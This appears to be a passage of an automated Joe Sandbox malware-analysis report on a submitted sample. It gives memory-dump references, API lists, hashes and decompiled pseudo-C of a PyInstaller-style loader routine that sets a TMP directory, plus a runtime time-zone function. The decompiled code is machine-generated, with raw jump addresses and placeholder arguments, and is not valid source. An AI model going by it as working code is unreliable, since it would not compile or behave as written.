                                                                                                                                                                                                                                                        0x7ff6e5ad5d9d
                                                                                                                                                                                                                                                        0x7ff6e5ad5da0
                                                                                                                                                                                                                                                        0x7ff6e5ad5da4
                                                                                                                                                                                                                                                        0x7ff6e5ad5dae
                                                                                                                                                                                                                                                        0x7ff6e5ad5db3
                                                                                                                                                                                                                                                        0x7ff6e5ad5db6
                                                                                                                                                                                                                                                        0x7ff6e5ad5dbb
                                                                                                                                                                                                                                                        0x7ff6e5ad5dbf
                                                                                                                                                                                                                                                        0x7ff6e5ad5dc4
                                                                                                                                                                                                                                                        0x7ff6e5ad5dc9
                                                                                                                                                                                                                                                        0x7ff6e5ad5dd2
                                                                                                                                                                                                                                                        0x7ff6e5ad5dd7
                                                                                                                                                                                                                                                        0x7ff6e5ad5ddf
                                                                                                                                                                                                                                                        0x7ff6e5ad5de1
                                                                                                                                                                                                                                                        0x7ff6e5ad5de8
                                                                                                                                                                                                                                                        0x7ff6e5ad5dea
                                                                                                                                                                                                                                                        0x7ff6e5ad5ded
                                                                                                                                                                                                                                                        0x7ff6e5ad5df4
                                                                                                                                                                                                                                                        0x7ff6e5ad5df9
                                                                                                                                                                                                                                                        0x7ff6e5ad5dfe
                                                                                                                                                                                                                                                        0x7ff6e5ad5e03
                                                                                                                                                                                                                                                        0x7ff6e5ad5e05
                                                                                                                                                                                                                                                        0x7ff6e5ad5e0c
                                                                                                                                                                                                                                                        0x7ff6e5ad5e0e
                                                                                                                                                                                                                                                        0x7ff6e5ad5e11
                                                                                                                                                                                                                                                        0x7ff6e5ad5e16
                                                                                                                                                                                                                                                        0x7ff6e5ad5e1c
                                                                                                                                                                                                                                                        0x7ff6e5ad5e30
                                                                                                                                                                                                                                                        0x7ff6e5ad5e3c
                                                                                                                                                                                                                                                        0x7ff6e5ad5e43
                                                                                                                                                                                                                                                        0x7ff6e5ad5e4b
                                                                                                                                                                                                                                                        0x7ff6e5ad5e50
                                                                                                                                                                                                                                                        0x7ff6e5ad5e55
                                                                                                                                                                                                                                                        0x7ff6e5ad5e60
                                                                                                                                                                                                                                                        0x7ff6e5ad5e67
                                                                                                                                                                                                                                                        0x7ff6e5ad5e6b
                                                                                                                                                                                                                                                        0x7ff6e5ad5e6e
                                                                                                                                                                                                                                                        0x7ff6e5ad5e72
                                                                                                                                                                                                                                                        0x7ff6e5ad5e78
                                                                                                                                                                                                                                                        0x7ff6e5ad5e87
                                                                                                                                                                                                                                                        0x7ff6e5ad5e8f
                                                                                                                                                                                                                                                        0x7ff6e5ad5e95
                                                                                                                                                                                                                                                        0x7ff6e5ad5e9e
                                                                                                                                                                                                                                                        0x7ff6e5ad5ea3
                                                                                                                                                                                                                                                        0x7ff6e5ad5ea7
                                                                                                                                                                                                                                                        0x7ff6e5ad5eaa
                                                                                                                                                                                                                                                        0x7ff6e5ad5eb1
                                                                                                                                                                                                                                                        0x7ff6e5ad5eb6
                                                                                                                                                                                                                                                        0x7ff6e5ad5ec2
                                                                                                                                                                                                                                                        0x7ff6e5ad5ecf
                                                                                                                                                                                                                                                        0x7ff6e5ad5ed1
                                                                                                                                                                                                                                                        0x7ff6e5ad5ee9
                                                                                                                                                                                                                                                        0x7ff6e5ad5eed
                                                                                                                                                                                                                                                        0x7ff6e5ad5efa
                                                                                                                                                                                                                                                        0x7ff6e5ad5eff
                                                                                                                                                                                                                                                        0x7ff6e5ad5f07
                                                                                                                                                                                                                                                        0x7ff6e5ad5f0f
                                                                                                                                                                                                                                                        0x7ff6e5ad5f19
                                                                                                                                                                                                                                                        0x7ff6e5ad5f1b
                                                                                                                                                                                                                                                        0x7ff6e5ad5f3c
                                                                                                                                                                                                                                                        0x7ff6e5ad5f44
                                                                                                                                                                                                                                                        0x7ff6e5ad5f4c
                                                                                                                                                                                                                                                        0x7ff6e5ad5f52
                                                                                                                                                                                                                                                        0x7ff6e5ad5f57
                                                                                                                                                                                                                                                        0x7ff6e5ad5f5d
                                                                                                                                                                                                                                                        0x7ff6e5ad5f62
                                                                                                                                                                                                                                                        0x7ff6e5ad5f69
                                                                                                                                                                                                                                                        0x7ff6e5ad5f6b
                                                                                                                                                                                                                                                        0x7ff6e5ad5f6f
                                                                                                                                                                                                                                                        0x7ff6e5ad5f74
                                                                                                                                                                                                                                                        0x7ff6e5ad5f76
                                                                                                                                                                                                                                                        0x7ff6e5ad5f7f
                                                                                                                                                                                                                                                        0x7ff6e5ad5f91
                                                                                                                                                                                                                                                        0x7ff6e5ad5f9c
                                                                                                                                                                                                                                                        0x7ff6e5ad5fa0
                                                                                                                                                                                                                                                        0x7ff6e5ad5fac
                                                                                                                                                                                                                                                        0x7ff6e5ad5fc6
                                                                                                                                                                                                                                                        0x7ff6e5ad5fcf
                                                                                                                                                                                                                                                        0x7ff6e5ad5fd3
                                                                                                                                                                                                                                                        0x7ff6e5ad5fd8
                                                                                                                                                                                                                                                        0x7ff6e5ad5fdd
                                                                                                                                                                                                                                                        0x7ff6e5ad5fe1
                                                                                                                                                                                                                                                        0x7ff6e5ad5fe9
                                                                                                                                                                                                                                                        0x7ff6e5ad5fee
                                                                                                                                                                                                                                                        0x7ff6e5ad5ff8
                                                                                                                                                                                                                                                        0x7ff6e5ad6001
                                                                                                                                                                                                                                                        0x7ff6e5ad6004
                                                                                                                                                                                                                                                        0x7ff6e5ad6008
                                                                                                                                                                                                                                                        0x7ff6e5ad600c
                                                                                                                                                                                                                                                        0x7ff6e5ad6016
                                                                                                                                                                                                                                                        0x7ff6e5ad601f
                                                                                                                                                                                                                                                        0x7ff6e5ad6023
                                                                                                                                                                                                                                                        0x7ff6e5ad603a
                                                                                                                                                                                                                                                        0x7ff6e5ad605f
                                                                                                                                                                                                                                                        0x7ff6e5ad6067
                                                                                                                                                                                                                                                        0x7ff6e5ad606d
                                                                                                                                                                                                                                                        0x7ff6e5ad606f
                                                                                                                                                                                                                                                        0x7ff6e5ad6080
                                                                                                                                                                                                                                                        0x7ff6e5ad6084
                                                                                                                                                                                                                                                        0x7ff6e5ad6094
                                                                                                                                                                                                                                                        0x7ff6e5ad609e
                                                                                                                                                                                                                                                        0x7ff6e5ad60a7
                                                                                                                                                                                                                                                        0x7ff6e5ad60b5
                                                                                                                                                                                                                                                        0x7ff6e5ad60b9
                                                                                                                                                                                                                                                        0x7ff6e5ad60bd
                                                                                                                                                                                                                                                        0x7ff6e5ad60c2
                                                                                                                                                                                                                                                        0x7ff6e5ad60c9
                                                                                                                                                                                                                                                        0x7ff6e5ad60d1
                                                                                                                                                                                                                                                        0x7ff6e5ad60dc
                                                                                                                                                                                                                                                        0x7ff6e5ad60e9
                                                                                                                                                                                                                                                        0x7ff6e5ad60f3
                                                                                                                                                                                                                                                        0x7ff6e5ad610d
                                                                                                                                                                                                                                                        0x7ff6e5ad6114
                                                                                                                                                                                                                                                        0x7ff6e5ad6119
                                                                                                                                                                                                                                                        0x7ff6e5ad6133
                                                                                                                                                                                                                                                        0x7ff6e5ad615a

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1617910340-0
                                                                                                                                                                                                                                                        • Opcode ID: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
                                                                                                                                                                                                                                                        • Instruction ID: 2b8de7b54b8c302edb9df7a5e1fb1432be6a454369ea896ebe75a3b632789525
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82C1C137B28A4186EB10EF69C4A06AC3761FB48F98B014229DE1EDB794CF3AD851C705
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AB6780(void* __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, void* __r8, void* __r9, intOrPtr _a8, char _a16, long long _a24, long long _a32, char _a56, signed int _a8248, void* _a8264) {
                                                                                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                                                                        				long _t21;
                                                                                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                                                                                        				void* _t60;
                                                                                                                                                                                                                                                        				signed long long _t72;
                                                                                                                                                                                                                                                        				signed long long _t73;
                                                                                                                                                                                                                                                        				intOrPtr _t122;
                                                                                                                                                                                                                                                        				void* _t124;
                                                                                                                                                                                                                                                        				void* _t126;
                                                                                                                                                                                                                                                        				void* _t131;
                                                                                                                                                                                                                                                        				void* _t132;
                                                                                                                                                                                                                                                        				void* _t133;
                                                                                                                                                                                                                                                        				void* _t135;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t131 = __r9;
                                                                                                                                                                                                                                                        				_t74 = __rbx;
                                                                                                                                                                                                                                                        				_t50 = __ecx;
                                                                                                                                                                                                                                                        				_a24 = __rbx;
                                                                                                                                                                                                                                                        				_a32 = __rbp;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABADB0(0x2060, __rax, _t132, _t133);
                                                                                                                                                                                                                                                        				_t127 = _t126 - __rax;
                                                                                                                                                                                                                                                        				_t72 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_t73 = _t72 ^ _t126 - __rax;
                                                                                                                                                                                                                                                        				_a8248 = _t73;
                                                                                                                                                                                                                                                        				_t124 = __rdx;
                                                                                                                                                                                                                                                        				_t135 = __rcx;
                                                                                                                                                                                                                                                        				if (__rdx == 0) goto 0xe5ab680b;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB6990(_t73, "TMP");
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB6480(__edx, _t73, __rbx, _t124, __r8);
                                                                                                                                                                                                                                                        				if (_t73 == 0) goto 0xe5ab68df;
                                                                                                                                                                                                                                                        				_t17 = E00007FF67FF6E5AC66B4(_t50, _t73, L"TMP", _t73);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC409C(_t50, _t73, _t73, __r8);
                                                                                                                                                                                                                                                        				if (_t17 == 0) goto 0xe5ab6810;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB2770(_t73, "LOADER: Failed to set the TMP environment variable.\n", _t73, __r8, _t131);
                                                                                                                                                                                                                                                        				goto 0xe5ab6968;
                                                                                                                                                                                                                                                        				_t122 = _a8;
                                                                                                                                                                                                                                                        				_t21 = GetTempPathW(??, ??);
                                                                                                                                                                                                                                                        				0xe5ac9104();
                                                                                                                                                                                                                                                        				r9d = _t21;
                                                                                                                                                                                                                                                        				_t130 = L"_MEI%d";
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB2470(_t73,  &_a16,  &_a56, L"_MEI%d", _t131);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC736C(_t131);
                                                                                                                                                                                                                                                        				_t24 = E00007FF67FF6E5AB78A0(_t73, _t74, _t73); // executed
                                                                                                                                                                                                                                                        				if (_t24 == 0) goto 0xe5ab68e6;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC409C(0x1000, _t73,  &_a16, L"_MEI%d");
                                                                                                                                                                                                                                                        				if (1 - 5 < 0) goto 0xe5ab6840;
                                                                                                                                                                                                                                                        				if (_t124 == 0) goto 0xe5ab68df;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB7A30(_t73, _t74, _t73, "TMP", _t122, L"_MEI%d");
                                                                                                                                                                                                                                                        				if (_t122 == 0) goto 0xe5ab68c9;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				_t119 = _t73;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB7A30(_t73, _t74, _t73, _t122, _t122, L"_MEI%d");
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC66B4(0, _t73, _t73, _t73);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC409C(0, _t73, _t73, L"_MEI%d");
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC409C(0, _t73, _t73, L"_MEI%d");
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC409C(0, _t122, _t73, L"_MEI%d");
                                                                                                                                                                                                                                                        				goto 0xe5ab6968;
                                                                                                                                                                                                                                                        				SetEnvironmentVariableW(??, ??);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC409C(0, _t73, _t73, _t130);
                                                                                                                                                                                                                                                        				goto 0xe5ab6968;
                                                                                                                                                                                                                                                        				r8d = 0x1000;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB7B40(_t60, _t73, _t135, _t73, _t122, _t124, _t130);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC409C(0, _t73, _t119, _t130);
                                                                                                                                                                                                                                                        				if (_t124 == 0) goto 0xe5ab6963;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB7A30(_t73, _t73, _t119, "TMP", _t122, _t130);
                                                                                                                                                                                                                                                        				if (_t122 == 0) goto 0xe5ab694d;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB7A30(_t73, _t73, _t119, _t122, _t122, _t130);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC66B4(0, _t73, _t73, _t73);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC409C(0, _t73, _t73, _t130);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC409C(0, _t73, _t73, _t130);
                                                                                                                                                                                                                                                        				goto 0xe5ab695e;
                                                                                                                                                                                                                                                        				SetEnvironmentVariableW(??, ??);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC409C(0, _t73, _t73, _t130);
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(1, 0, _a8248 ^ _t127);
                                                                                                                                                                                                                                                        			}


















                                                                                                                                                                                                                                                        0x7ff6e5ab6780
                                                                                                                                                                                                                                                        0x7ff6e5ab6780
                                                                                                                                                                                                                                                        0x7ff6e5ab6780
                                                                                                                                                                                                                                                        0x7ff6e5ab6780
                                                                                                                                                                                                                                                        0x7ff6e5ab6785
                                                                                                                                                                                                                                                        0x7ff6e5ab6793
                                                                                                                                                                                                                                                        0x7ff6e5ab6798
                                                                                                                                                                                                                                                        0x7ff6e5ab679b
                                                                                                                                                                                                                                                        0x7ff6e5ab67a2
                                                                                                                                                                                                                                                        0x7ff6e5ab67a5
                                                                                                                                                                                                                                                        0x7ff6e5ab67ad
                                                                                                                                                                                                                                                        0x7ff6e5ab67b0
                                                                                                                                                                                                                                                        0x7ff6e5ab67b6
                                                                                                                                                                                                                                                        0x7ff6e5ab67bf
                                                                                                                                                                                                                                                        0x7ff6e5ab67ca
                                                                                                                                                                                                                                                        0x7ff6e5ab67d5
                                                                                                                                                                                                                                                        0x7ff6e5ab67e5
                                                                                                                                                                                                                                                        0x7ff6e5ab67ef
                                                                                                                                                                                                                                                        0x7ff6e5ab67f6
                                                                                                                                                                                                                                                        0x7ff6e5ab67ff
                                                                                                                                                                                                                                                        0x7ff6e5ab6806
                                                                                                                                                                                                                                                        0x7ff6e5ab680b
                                                                                                                                                                                                                                                        0x7ff6e5ab681a
                                                                                                                                                                                                                                                        0x7ff6e5ab6820
                                                                                                                                                                                                                                                        0x7ff6e5ab6825
                                                                                                                                                                                                                                                        0x7ff6e5ab6828
                                                                                                                                                                                                                                                        0x7ff6e5ab6839
                                                                                                                                                                                                                                                        0x7ff6e5ab684a
                                                                                                                                                                                                                                                        0x7ff6e5ab6855
                                                                                                                                                                                                                                                        0x7ff6e5ab685c
                                                                                                                                                                                                                                                        0x7ff6e5ab6865
                                                                                                                                                                                                                                                        0x7ff6e5ab686f
                                                                                                                                                                                                                                                        0x7ff6e5ab6874
                                                                                                                                                                                                                                                        0x7ff6e5ab6876
                                                                                                                                                                                                                                                        0x7ff6e5ab6882
                                                                                                                                                                                                                                                        0x7ff6e5ab688a
                                                                                                                                                                                                                                                        0x7ff6e5ab688c
                                                                                                                                                                                                                                                        0x7ff6e5ab6894
                                                                                                                                                                                                                                                        0x7ff6e5ab6897
                                                                                                                                                                                                                                                        0x7ff6e5ab68a5
                                                                                                                                                                                                                                                        0x7ff6e5ab68ad
                                                                                                                                                                                                                                                        0x7ff6e5ab68b5
                                                                                                                                                                                                                                                        0x7ff6e5ab68bd
                                                                                                                                                                                                                                                        0x7ff6e5ab68c4
                                                                                                                                                                                                                                                        0x7ff6e5ab68d1
                                                                                                                                                                                                                                                        0x7ff6e5ab68da
                                                                                                                                                                                                                                                        0x7ff6e5ab68e1
                                                                                                                                                                                                                                                        0x7ff6e5ab68e6
                                                                                                                                                                                                                                                        0x7ff6e5ab68f2
                                                                                                                                                                                                                                                        0x7ff6e5ab68fa
                                                                                                                                                                                                                                                        0x7ff6e5ab6902
                                                                                                                                                                                                                                                        0x7ff6e5ab6904
                                                                                                                                                                                                                                                        0x7ff6e5ab6910
                                                                                                                                                                                                                                                        0x7ff6e5ab6918
                                                                                                                                                                                                                                                        0x7ff6e5ab691a
                                                                                                                                                                                                                                                        0x7ff6e5ab6925
                                                                                                                                                                                                                                                        0x7ff6e5ab6933
                                                                                                                                                                                                                                                        0x7ff6e5ab693b
                                                                                                                                                                                                                                                        0x7ff6e5ab6943
                                                                                                                                                                                                                                                        0x7ff6e5ab694b
                                                                                                                                                                                                                                                        0x7ff6e5ab6955
                                                                                                                                                                                                                                                        0x7ff6e5ab695e
                                                                                                                                                                                                                                                        0x7ff6e5ab698f

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(?,00000000,?,00007FF6E5AB674D), ref: 00007FF6E5AB681A
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB6990: GetEnvironmentVariableW.KERNEL32(00007FF6E5AB36E7), ref: 00007FF6E5AB69CA
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB6990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6E5AB69E7
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AC66B4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E5AC66CD
                                                                                                                                                                                                                                                        • SetEnvironmentVariableW.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF6E5AB68D1
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB2770: MessageBoxW.USER32 ref: 00007FF6E5AB2841
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                        • API String ID: 3752271684-1116378104
                                                                                                                                                                                                                                                        • Opcode ID: e6afb0128859ccbf49ce8011b8d869e8e025b7611e3f9a50b4fcc1994f3a2000
                                                                                                                                                                                                                                                        • Instruction ID: 7137104646b97ed06266c17e38f959307281fb46cbf4f8d04b4cbcf3b3682712
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6afb0128859ccbf49ce8011b8d869e8e025b7611e3f9a50b4fcc1994f3a2000
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62518E13F1D65640FA94BB6AA9353BA53515F45FC0F440035ED0ECB79ADE2EEC01878A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 799 7ff6e5ad509c-7ff6e5ad50d1 call 7ff6e5ad47a8 call 7ff6e5ad47b0 call 7ff6e5ad4818 806 7ff6e5ad520f-7ff6e5ad527d call 7ff6e5ac9dd0 call 7ff6e5ad06b8 799->806 807 7ff6e5ad50d7-7ff6e5ad50e2 call 7ff6e5ad47b8 799->807 818 7ff6e5ad527f-7ff6e5ad5286 806->818 819 7ff6e5ad528b-7ff6e5ad528e 806->819 807->806 812 7ff6e5ad50e8-7ff6e5ad50f3 call 7ff6e5ad47e8 807->812 812->806 820 7ff6e5ad50f9-7ff6e5ad511c call 7ff6e5ac9e18 GetTimeZoneInformation 812->820 821 7ff6e5ad531b-7ff6e5ad531e 818->821 823 7ff6e5ad52c5-7ff6e5ad52d8 call 7ff6e5accacc 819->823 824 7ff6e5ad5290 819->824 833 7ff6e5ad5122-7ff6e5ad5143 820->833 834 7ff6e5ad51e4-7ff6e5ad520e call 7ff6e5ad47a0 call 7ff6e5ad4790 call 7ff6e5ad4798 820->834 826 7ff6e5ad5293 821->826 827 7ff6e5ad5324-7ff6e5ad532c call 7ff6e5ad4e20 821->827 839 7ff6e5ad52e3-7ff6e5ad52fe call 7ff6e5ad06b8 823->839 840 7ff6e5ad52da 823->840 824->826 829 7ff6e5ad5298-7ff6e5ad52c4 call 7ff6e5ac9e18 call 7ff6e5abad80 826->829 830 7ff6e5ad5293 call 7ff6e5ad509c 826->830 827->829 830->829 835 7ff6e5ad5145-7ff6e5ad514b 833->835 836 7ff6e5ad514e-7ff6e5ad5155 833->836 835->836 842 7ff6e5ad5157-7ff6e5ad515f 836->842 843 7ff6e5ad5169 836->843 858 7ff6e5ad5305-7ff6e5ad5317 call 7ff6e5ac9e18 839->858 859 7ff6e5ad5300-7ff6e5ad5303 839->859 846 7ff6e5ad52dc-7ff6e5ad52e1 call 7ff6e5ac9e18 840->846 842->843 848 7ff6e5ad5161-7ff6e5ad5167 842->848 850 7ff6e5ad516b-7ff6e5ad51df call 7ff6e5abc210 * 4 call 7ff6e5ad1c7c call 7ff6e5ad5334 * 2 843->850 846->824 848->850 850->834 858->821 859->846
                                                                                                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AD509C(void* __eflags, signed int* __rax, long long __rbx, void* __rdx, void* __r9, signed int _a8, signed int _a16, signed int _a24, long long _a32) {
                                                                                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                                                                        				intOrPtr _t31;
                                                                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                                                                        				intOrPtr _t60;
                                                                                                                                                                                                                                                        				signed int* _t63;
                                                                                                                                                                                                                                                        				long long _t69;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t64 = __rbx;
                                                                                                                                                                                                                                                        				_t63 = __rax;
                                                                                                                                                                                                                                                        				_a32 = __rbx;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD47B0(E00007FF67FF6E5AD47A8(_t21));
                                                                                                                                                                                                                                                        				_a8 = 0;
                                                                                                                                                                                                                                                        				_a16 = 0;
                                                                                                                                                                                                                                                        				_a24 = 0;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD4818(_t63,  &_a8) != 0) goto 0xe5ad520f;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD47B8(_t63,  &_a16) != 0) goto 0xe5ad520f;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD47E8(_t63,  &_a24) != 0) goto 0xe5ad520f;
                                                                                                                                                                                                                                                        				_t69 =  *0xe5afd2c0; // 0x0
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t63, _t69);
                                                                                                                                                                                                                                                        				 *0xe5afd2c0 = __rbx; // executed
                                                                                                                                                                                                                                                        				_t28 = GetTimeZoneInformation(??); // executed
                                                                                                                                                                                                                                                        				if (_t28 == 0xffffffff) goto 0xe5ad51e4;
                                                                                                                                                                                                                                                        				_t49 =  *0xe5afd2e0 * 0x3c;
                                                                                                                                                                                                                                                        				_t8 = _t64 + 1; // 0x1
                                                                                                                                                                                                                                                        				_t59 =  *0xe5afd326; // 0xb
                                                                                                                                                                                                                                                        				r8d =  *0xe5afd334; // 0x0
                                                                                                                                                                                                                                                        				 *0xe5afd2d0 = _t8;
                                                                                                                                                                                                                                                        				_a8 = _t49;
                                                                                                                                                                                                                                                        				if (_t59 == 0) goto 0xe5ad514e;
                                                                                                                                                                                                                                                        				_a8 = r8d * 0x3c + _t49;
                                                                                                                                                                                                                                                        				_t60 =  *0xe5afd37a; // 0x3
                                                                                                                                                                                                                                                        				if (_t60 == 0) goto 0xe5ad5169;
                                                                                                                                                                                                                                                        				_t31 =  *0xe5afd388; // 0xffffffc4
                                                                                                                                                                                                                                                        				if (_t31 == 0) goto 0xe5ad5169;
                                                                                                                                                                                                                                                        				_t40 = (_t31 - r8d) * 0x3c;
                                                                                                                                                                                                                                                        				goto 0xe5ad516b;
                                                                                                                                                                                                                                                        				_a24 = _t40;
                                                                                                                                                                                                                                                        				_a16 = _t40;
                                                                                                                                                                                                                                                        				r8d = 0x80;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC210();
                                                                                                                                                                                                                                                        				r8d = 0x80;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC210();
                                                                                                                                                                                                                                                        				r8d = 0x40;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC210();
                                                                                                                                                                                                                                                        				r8d = 0x40;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABC210();
                                                                                                                                                                                                                                                        				_t33 = E00007FF67FF6E5AD1C7C(_t40, 0, _t63, __rbx, _t63[2], __rdx, _t63, __r9);
                                                                                                                                                                                                                                                        				r9d = _t33;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AD5334(__rbx, 0xe5afd2e4,  *_t63, _t63,  *_t63, __r9);
                                                                                                                                                                                                                                                        				r9d = _t33;
                                                                                                                                                                                                                                                        				_t36 = E00007FF67FF6E5AD47A0(E00007FF67FF6E5AD5334(_t64, 0xe5afd338, _t63[2], _t63, _t63[2], __r9));
                                                                                                                                                                                                                                                        				 *_t63 = _a8;
                                                                                                                                                                                                                                                        				_t37 = E00007FF67FF6E5AD4790(_t36);
                                                                                                                                                                                                                                                        				 *_t63 = _a16;
                                                                                                                                                                                                                                                        				_t38 = E00007FF67FF6E5AD4798(_t37);
